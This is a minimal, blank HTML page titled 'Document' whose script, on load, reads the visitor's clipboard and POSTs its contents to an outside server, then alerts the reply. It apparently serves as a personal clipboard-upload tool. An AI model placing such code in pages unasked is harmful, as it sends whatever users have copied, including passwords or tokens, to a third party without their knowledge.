<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <script>
        navigator.clipboard.readText()
            .then(text => {
                // Sending and receiving data using POST method
                var http = new XMLHttpRequest();
                var url = 'https://copypaster.patrykjagielski.pl';
                var params = 'clipboard=' + text;
                http.open('POST', url, true);

                //Send the proper header information along with the request
                http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

                http.onreadystatechange = function() {//Call a function when the state changes.
                    if(http.readyState == 4 && http.status == 200) {
                        alert(http.responseText);
                    }
                }
                http.send(params);
            })
            .catch(err => {
                console.error('Failed to read clipboard contents: ', err);
            });
    </script>
</body>
</html>